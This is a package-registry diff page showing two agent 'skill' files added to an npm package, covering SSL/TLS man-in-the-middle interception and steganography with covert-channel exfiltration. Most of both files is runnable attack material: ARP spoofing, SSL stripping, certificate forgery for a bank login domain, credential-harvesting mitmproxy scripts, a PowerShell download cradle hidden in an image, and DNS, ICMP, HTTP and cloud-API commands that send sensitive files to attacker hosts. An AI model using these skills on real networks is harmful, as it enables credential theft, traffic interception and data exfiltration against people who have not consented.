npm - rtexit-method - Versions diffs - 0.1.4 → 0.1.5 - Mend

rtexit-method 0.1.4 → 0.1.5

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (11) hide show

package/packaged-assets/.agents/skills/rt-ssl-mitm/SKILL.md ADDED Viewed

@@ -0,0 +1,305 @@
+---
+name: rt-ssl-mitm
+description: "SSL/TLS interception and Man-in-the-Middle skill for authorized engagements. mitmproxy transparent proxy setup, Burp Suite MITM configuration, custom CA certificate injection, SSL stripping with SSLstrip2, HSTS bypass, certificate pinning bypass (mobile/desktop), TLS downgrade attacks, and traffic decryption workflows. Use when testing HTTPS applications, intercepting mobile app traffic, or demonstrating insecure TLS configurations."
+---
+# rt-ssl-mitm — SSL/TLS Interception & Man-in-the-Middle
+## Overview
+SSL/TLS MITM attacks intercept encrypted HTTPS traffic between a client and server. In authorized red team engagements, this demonstrates: weak certificate validation, missing HSTS, bypassable certificate pinning, insecure TLS configurations, and cleartext credential exposure after decryption.
+**Attack scenarios:**
+- Intercept mobile app traffic (no certificate pinning)
+- Demonstrate SSL stripping on internal network
+- Forge certificates to impersonate internal services
+- Decrypt TLS traffic for credential harvesting
+- TLS downgrade to expose weak cipher suites
+---
+## Prerequisites
+```bash
+# Install tools
+pip3 install mitmproxy
+apt install sslstrip2 bettercap wireshark tcpdump -y
+# Burp Suite Pro/Community — https://portswigger.net/burp
+# mitmproxy — https://mitmproxy.org
+```
+---
+## Method 1 — mitmproxy (Full HTTPS Interception)
+### 1a — Transparent Proxy (No client config needed — network position)
+```bash
+# Enable IP forwarding
+echo 1 > /proc/sys/net/ipv4/ip_forward
+# ARP spoof target (position yourself between target and gateway)
+arpspoof -i eth0 -t TARGET_IP GATEWAY_IP &
+arpspoof -i eth0 -t GATEWAY_IP TARGET_IP &
+# Redirect HTTP and HTTPS to mitmproxy
+iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80  -j REDIRECT --to-port 8080
+iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8080
+# Start mitmproxy in transparent mode
+mitmproxy --mode transparent --showhost
+# Or mitmdump (no UI — log to file)
+mitmdump --mode transparent --showhost -w traffic.mitm
+# View captured traffic
+mitmproxy -r traffic.mitm
+```
+### 1b — Regular Proxy Mode (Configure browser/app to use proxy)
+```bash
+# Start mitmproxy
+mitmproxy -p 8080
+# Or with web UI
+mitmweb -p 8080
+# Access: http://127.0.0.1:8081
+# Install mitmproxy CA cert on target device
+# CA cert location: ~/.mitmproxy/mitmproxy-ca-cert.pem
+# Android: Settings → Security → Install from storage
+# iOS: Settings → General → Profile → Install
+# Windows: certmgr.msc → Trusted Root CAs → Import
+# Linux: cp mitmproxy-ca-cert.pem /usr/local/share/ca-certificates/ && update-ca-certificates
+```
+### 1c — mitmproxy Scripts (Extract credentials automatically)
+```python
+# cred_extractor.py — auto-extract POST credentials
+from mitmproxy import http
+import re
+def request(flow: http.HTTPFlow):
+    if flow.request.method == "POST":
+        body = flow.request.get_text()
+        # Extract common credential patterns
+        patterns = [
+            r'(password|passwd|pass|pwd)=([^&\s]+)',
+            r'(username|user|login|email)=([^&\s]+)',
+            r'"(password|token|api_key)"\s*:\s*"([^"]+)"',
+        ]
+        for p in patterns:
+            for m in re.findall(p, body, re.IGNORECASE):
+                print(f"[CRED] {flow.request.host} | {m[0]}={m[1]}")
+        # Log all POST to file
+        with open("/tmp/posts.log", "a") as f:
+            f.write(f"\n=== {flow.request.host}{flow.request.path} ===\n{body}\n")
+```
+```bash
+# Run with script
+mitmproxy -p 8080 -s cred_extractor.py
+```
+---
+## Method 2 — Burp Suite MITM
+```bash
+# Start Burp Suite → Proxy → Options
+# Bind: 0.0.0.0:8080 (all interfaces)
+# Import Burp CA: http://burpsuite/cert → download → install on target
+# Intercept all HTTPS from target network
+# Add upstream proxy chain if needed:
+# User Options → Connections → Upstream Proxy → add target network gateway
+# Burp invisible proxy (for non-proxy-aware clients)
+# Proxy → Options → Edit listener → Request Handling
+# ☑ Support invisible proxying
+# Add iptables redirect rules (same as mitmproxy transparent)
+iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 8080
+```
+---
+## Method 3 — SSL Stripping (HTTP Downgrade)
+```bash
+# SSLstrip2 + bettercap — downgrades HTTPS to HTTP even with HSTS (partially)
+# Method A: bettercap (modern, all-in-one)
+bettercap -iface eth0
+# In bettercap console:
+net.probe on                    # Discover hosts
+set arp.spoof.targets TARGET_IP
+arp.spoof on                    # Position as MITM
+set net.sniff.verbose true
+net.sniff on                    # Capture traffic
+https.proxy on                  # SSL strip
+# Method B: sslstrip2
+python3 sslstrip2.py -l 10000 -w stripped.log
+iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
+# HSTS bypass technique: rename www.target.com → wwww.target.com (extra w)
+# If HSTS not pinned to subdomains, works on some sites
+```
+---
+## Method 4 — Custom CA Certificate Forgery
+```bash
+# Generate your own CA
+openssl genrsa -out myCA.key 4096
+openssl req -x509 -new -nodes -key myCA.key -sha256 -days 1825 \
+  -out myCA.pem \
+  -subj "/C=US/ST=NY/O=Corp IT/CN=Corp Internal CA"
+# Sign a fake certificate for any domain
+openssl genrsa -out fake.key 2048
+openssl req -new -key fake.key -out fake.csr \
+  -subj "/CN=login.bank.com/O=Bank Corp/C=US"
+openssl x509 -req -in fake.csr -CA myCA.pem -CAkey myCA.key \
+  -CAcreateserial -out fake.crt -days 365 -sha256 \
+  -extfile <(printf "subjectAltName=DNS:login.bank.com,DNS:*.bank.com")
+# Configure nginx to serve with fake cert
+server {
+    listen 443 ssl;
+    server_name login.bank.com;
+    ssl_certificate /path/to/fake.crt;
+    ssl_certificate_key /path/to/fake.key;
+    location / { proxy_pass https://real-login.bank.com; }
+}
+# If target has your CA installed → no browser warning
+```
+---
+## Method 5 — TLS Configuration Audit & Downgrade
+```bash
+# Test TLS configuration of target
+testssl.sh https://target.com
+# Checks: supported versions, cipher suites, HSTS, HPKP, certificate issues
+# Check for weak ciphers
+nmap --script ssl-enum-ciphers -p 443 target.com
+# Look for: SSLv3, TLSv1.0, TLSv1.1, RC4, DES, EXPORT ciphers
+# Check certificate details
+openssl s_client -connect target.com:443 -showcerts 2>/dev/null | openssl x509 -noout -text
+# Look for: SHA1 signature, weak key size (<2048), expired, wrong SAN
+# TLS downgrade test
+openssl s_client -connect target.com:443 -tls1    # Force TLS 1.0
+openssl s_client -connect target.com:443 -ssl3    # Force SSLv3 (POODLE)
+openssl s_client -connect target.com:443 -cipher RC4-SHA  # Force RC4
+# BEAST/POODLE/DROWN scanner
+python3 test-rc4.py target.com
+```
+---
+## Method 6 — Certificate Pinning Bypass
+```bash
+# Mobile apps pin the server certificate — MITM fails without bypass
+# See also: rt-exploit-android / rt-exploit-ios for Frida-based bypass
+# Universal pinning bypass (Frida)
+frida -U -f com.target.app --no-pause -s ssl-pinning-bypass.js
+# Scripts: github.com/httptoolkit/frida-interception-and-unpinning
+# objection (easier)
+objection -g com.target.app explore
+objection> android sslpinning disable
+objection> ios sslpinning disable
+# Desktop apps (Charles/mitmproxy CA install + bypass)
+# Electron: nodeIntegration=true → patch tlsSocket
+# .NET: add custom CertificateValidationCallback returning true
+# Java: override TrustManager to accept all certs
+```
+---
+## Method 7 — Network-Wide Interception (Internal Red Team)
+```bash
+# Full internal network MITM — intercept all HTTPS traffic on subnet
+# Step 1 — ARP spoof entire subnet (use carefully — can cause DoS)
+bettercap -iface eth0 -eval "set arp.spoof.targets 192.168.1.0/24; arp.spoof on; net.sniff on"
+# Step 2 — Redirect all HTTPS to mitmproxy
+iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 8080
+mitmproxy --mode transparent
+# Step 3 — Parse captured traffic
+mitmdump -r traffic.mitm -q --flow-detail 3 | grep -i "password\|token\|Authorization"
+# Step 4 — Extract credentials from MITM dump
+python3 << 'EOF'
+from mitmproxy.io import FlowReader
+with open("traffic.mitm", "rb") as f:
+    reader = FlowReader(f)
+    for flow in reader.stream():
+        if hasattr(flow, 'request') and flow.request.method == "POST":
+            print(f"HOST: {flow.request.host}")
+            print(f"BODY: {flow.request.get_text()[:500]}")
+            print("---")
+EOF
+```
+---
+## Skill Levels
+**BEGINNER:** Burp Suite proxy + install CA cert → intercept browser traffic
+**INTERMEDIATE:** mitmproxy transparent proxy + ARP spoof → network-wide interception + credential extraction script
+**ADVANCED:** SSL stripping with bettercap + HSTS bypass + certificate forgery for internal services
+**EXPERT:** Custom mitmproxy scripts for automated credential harvesting + TLS fingerprint analysis + certificate pinning bypass on hardened apps
+---
+## Findings Documentation
+```
+Finding: SSL/TLS Interception Possible
+Severity: HIGH
+CVSS: 7.4 (AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N)
+MITRE: T1557.002 (ARP Cache Poisoning), T1040 (Network Sniffing)
+Evidence:
+- Screenshot of intercepted credentials in mitmproxy
+- List of hosts with no HSTS or HPKP
+- TLS version support matrix from testssl.sh
+Remediation:
+- Enforce HSTS with max-age=31536000; includeSubDomains; preload
+- Implement certificate pinning in mobile/desktop apps
+- Disable TLS 1.0/1.1 and weak cipher suites
+- Deploy 802.1X on internal network to prevent ARP spoofing
+```
+---
+## References
+- mitmproxy docs: https://docs.mitmproxy.org
+- bettercap: https://www.bettercap.org
+- testssl.sh: https://github.com/drwetter/testssl.sh
+- MITRE T1557: https://attack.mitre.org/techniques/T1557/

package/packaged-assets/.agents/skills/rt-steganography/SKILL.md ADDED Viewed

@@ -0,0 +1,293 @@
+---
+name: rt-steganography
+description: "Steganography detection, extraction, and covert channel exploitation skill for authorized engagements. LSB steganography detection in images/audio, StegSolve analysis, outguess and steghide extraction, DNS tunneling for C2 and data exfiltration, ICMP covert channel, HTTP header hiding, and polyglot file creation. Use when testing data exfiltration controls, covert channel detection, or analyzing suspicious files."
+---
+# rt-steganography — Steganography & Covert Channels
+## Overview
+Steganography hides data inside legitimate files (images, audio, video, documents). Covert channels transmit data through unexpected protocol fields. In red team engagements these are used for: stealthy C2 communication, data exfiltration bypassing DLP, and hiding payloads inside innocent-looking files.
+---
+## Phase 1 — Steganography Detection
+```bash
+# Install tools
+apt install steghide outguess stegosuite binwalk exiftool -y
+pip3 install stegano
+# Check file for embedded data
+steghide info suspicious.jpg       # Check if steghide used
+steghide extract -sf suspicious.jpg -p ""  # Try empty password
+# Check metadata for hidden info
+exiftool suspicious.jpg            # EXIF data — can contain hidden text
+exiftool -all= clean.jpg           # Strip all metadata (for cleanup)
+# binwalk — find embedded files
+binwalk suspicious.jpg
+binwalk -e suspicious.jpg          # Extract embedded content
+# Look for: PK (zip), JFIF (jpeg), PNG header embedded in another file
+# Check for appended data after EOF
+xxd suspicious.jpg | tail -20
+# Normal JPEG ends with: FF D9
+# Data after FF D9 = hidden content
+# File size anomaly detection
+# Expected JPG at resolution X×Y should be ~N bytes
+# If much larger → hidden data likely
+identify -verbose suspicious.jpg | grep "File size"
+```
+### 1b — LSB Analysis with StegSolve
+```bash
+# StegSolve — visual steganography analyzer
+# java -jar stegsolve.jar
+# Manual LSB check (Python)
+python3 << 'EOF'
+from PIL import Image
+def extract_lsb(image_path, num_bits=1):
+    img = Image.open(image_path).convert("RGB")
+    pixels = list(img.getdata())
+    bits = ""
+    for pixel in pixels:
+        for channel in pixel:
+            bits += str(channel & 1)  # LSB of each channel
+    # Convert bits to text
+    chars = [bits[i:i+8] for i in range(0, len(bits), 8)]
+    text = ""
+    for c in chars:
+        try:
+            char = chr(int(c, 2))
+            if char.isprintable():
+                text += char
+            else:
+                break
+        except: break
+    return text[:500]  # First 500 printable chars
+result = extract_lsb("suspicious.jpg")
+print("LSB content:", result)
+EOF
+```
+### 1c — Statistical Detection
+```bash
+# StegoVeritas — comprehensive stego analysis
+pip3 install stegoveritas
+stegoveritas suspicious.jpg -out ./analysis/
+# Tests: LSB, metadata, appended data, color histograms, etc.
+# zsteg — detect in PNG/BMP
+gem install zsteg
+zsteg suspicious.png        # Try all common stego methods
+zsteg -a suspicious.png     # Try all channels
+# Audio steganography detection
+apt install mp3stego sox -y
+mp3stego -X suspicious.mp3  # Check MP3 for hidden data
+# Spectrum analysis (audio)
+python3 << 'EOF'
+import numpy as np
+import scipy.io.wavfile as wav
+import matplotlib.pyplot as plt
+rate, data = wav.read("suspicious.wav")
+freq = np.fft.fft(data[:rate])  # First second
+plt.specgram(data, Fs=rate, cmap='inferno')
+plt.savefig("spectrum.png")
+# Visual: hidden text/images sometimes visible in spectrogram
+EOF
+```
+---
+## Phase 2 — Embed Data (Red Team Exfiltration)
+```bash
+# Steghide — embed file in JPEG/BMP/WAV/AU
+steghide embed -cf cover.jpg -sf secret.txt -p "passphrase" -sf output.jpg
+# -cf = cover file, -sf = secret file, -p = password
+# Hide PowerShell payload in image
+echo "IEX(New-Object Net.WebClient).DownloadString('http://C2/shell.ps1')" > payload.txt
+steghide embed -cf photo.jpg -sf payload.txt -p "" -f  # No password, force
+# Extract on target
+steghide extract -sf photo.jpg -p ""
+# Outguess (harder to detect)
+outguess -k "secretkey" -d hidden.txt cover.jpg output.jpg
+outguess -k "secretkey" -r output.jpg recovered.txt
+# Hide in document metadata
+exiftool -Comment="BASE64_PAYLOAD" document.pdf
+exiftool -Artist="$(cat payload.txt | base64)" photo.jpg
+# Polyglot file (valid as two different formats)
+# JPEG + ZIP polyglot — opens as image AND contains ZIP
+cat cover.jpg payload.zip > polyglot.jpg
+# unzip polyglot.jpg → extracts ZIP contents
+# browser/image viewer → shows image
+```
+---
+## Phase 3 — DNS Tunneling (C2 / Exfiltration)
+```bash
+# DNS tunneling encodes data in DNS queries/responses
+# Bypasses most firewalls (DNS port 53 almost always allowed)
+# iodine — full IP tunnel over DNS
+# Server (needs a domain with NS record pointing to your server)
+iodined -f -c -P password 10.0.0.1 tunnel.attacker.com
+# Client (on compromised host)
+iodine -f -P password tunnel.attacker.com
+# Creates tun0 with 10.0.0.2 → full IP connectivity over DNS
+# dnscat2 — DNS C2 (simpler, no root needed)
+# Server
+ruby dnscat2.rb --dns "domain=tunnel.attacker.com,host=0.0.0.0" --secret=password
+# Client (on target)
+./dnscat --dns domain=tunnel.attacker.com --secret=password
+# Or PowerShell client:
+IEX (New-Object Net.WebClient).DownloadString('http://C2/Invoke-DNScat.ps1')
+Invoke-DNScat -Domain tunnel.attacker.com -Secret password
+# Manual DNS exfiltration (no tool needed — extreme environments)
+# Split secret into 63-char DNS label chunks
+python3 << 'EOF'
+import base64, subprocess
+secret = open("sensitive_data.txt", "rb").read()
+encoded = base64.b32encode(secret).decode().lower().rstrip("=")
+chunks = [encoded[i:i+60] for i in range(0, len(encoded), 60)]
+for i, chunk in enumerate(chunks):
+    # Each chunk = DNS query → logged by attacker's DNS server
+    subprocess.run(["nslookup", f"{i}.{chunk}.exfil.attacker.com"], capture_output=True)
+EOF
+```
+---
+## Phase 4 — ICMP Covert Channel
+```bash
+# ptunnel-ng — TCP over ICMP (bypasses TCP-blocking firewalls)
+# Server (attacker)
+ptunnel-ng -p ATTACKER_IP
+# Client (compromised host — only ICMP allowed out)
+ptunnel-ng -p ATTACKER_IP -lp 8022 -da INTERNAL_SSH_HOST -dp 22
+# Routes TCP port 8022 → ICMP → INTERNAL_SSH_HOST:22
+ssh -p 8022 user@localhost
+# Manual ICMP data hiding
+python3 << 'EOF'
+from scapy.all import *
+# Hide data in ICMP echo request payload
+secret = b"stolen_credential_hash_here"
+packet = IP(dst="8.8.8.8") / ICMP(type=8, code=0) / Raw(load=secret)
+send(packet)
+# Receive: monitor ICMP on attacker side
+sniff(filter="icmp and icmp[icmptype]=8",
+      prn=lambda p: print("RECV:", bytes(p[Raw])))
+EOF
+```
+---
+## Phase 5 — HTTP/HTTPS Covert Channels
+```bash
+# Hide data in HTTP headers (not logged by most proxies)
+curl https://target.com/ \
+  -H "X-Custom-Data: $(echo 'stolen data' | base64)" \
+  -H "X-Request-ID: $(cat /etc/passwd | head -1 | base64)"
+# HTTP timing channel (encode bits via request timing)
+python3 << 'EOF'
+import requests, time
+def send_bit(bit, url):
+    if bit == '1':
+        time.sleep(0.5)  # Delay = 1 bit
+    requests.get(url)    # Request = 0 bit
+secret = "SECRET"
+bits = ''.join(format(ord(c), '08b') for c in secret)
+for bit in bits:
+    send_bit(bit, "https://attacker.com/beacon")
+EOF
+# Exfil in User-Agent or other headers
+# (many DLP tools don't inspect all headers)
+curl "https://www.google.com" \
+  -H "User-Agent: Mozilla/5.0 $(cat sensitive.txt | base64 | tr -d '\n' | head -c 100)"
+```
+---
+## Phase 6 — DLP Bypass Techniques
+```bash
+# Bypass Data Loss Prevention controls
+# Encode data to avoid keyword detection
+cat sensitive.txt | base64 | curl -X POST https://attacker.com/ -d @-
+cat sensitive.txt | gzip | base64 | curl -X POST https://attacker.com/ -d @-
+# Embed in image (DLP can't scan steganography)
+steghide embed -cf innocent.jpg -sf sensitive.txt -p "key" && \
+  curl -X POST https://fileupload.attacker.com/ -F "file=@innocent.jpg"
+# Exfil via cloud storage (often whitelisted by DLP)
+aws s3 cp sensitive.txt s3://attacker-bucket/ --acl public-read
+# Or: Google Drive, Dropbox, OneDrive via API
+# Exfil over allowed SaaS APIs
+# Slack: post to attacker-controlled workspace
+curl -X POST https://slack.com/api/files.upload \
+  -H "Authorization: Bearer ATTACKER_TOKEN" \
+  -F file=@sensitive.txt -F channels=C0123456
+# GitHub Gist
+curl -X POST https://api.github.com/gists \
+  -H "Authorization: token ATTACKER_TOKEN" \
+  -d "{\"public\":false,\"files\":{\"data.txt\":{\"content\":\"$(base64 sensitive.txt)\"}}}"
+```
+---
+## Skill Levels
+**BEGINNER:** steghide/binwalk for detection · Basic LSB extraction · DNS exfiltration via nslookup
+**INTERMEDIATE:** iodine/dnscat2 C2 tunnel · ICMP covert channel · Embed payloads in images · DLP bypass via encoding
+**ADVANCED:** ptunnel-ng TCP-over-ICMP · Custom ICMP/HTTP covert channels · Statistical stego detection
+**EXPERT:** Custom DNS C2 protocol · Timing covert channels · Steganography in video streams · Anti-forensic exfiltration
+---
+## References
+- iodine: https://github.com/yarrick/iodine
+- dnscat2: https://github.com/iagox86/dnscat2
+- ptunnel-ng: https://github.com/utoni/ptunnel-ng
+- steghide: https://steghide.sourceforge.net
+- zsteg: https://github.com/zed-0xff/zsteg
+- MITRE T1048: https://attack.mitre.org/techniques/T1048/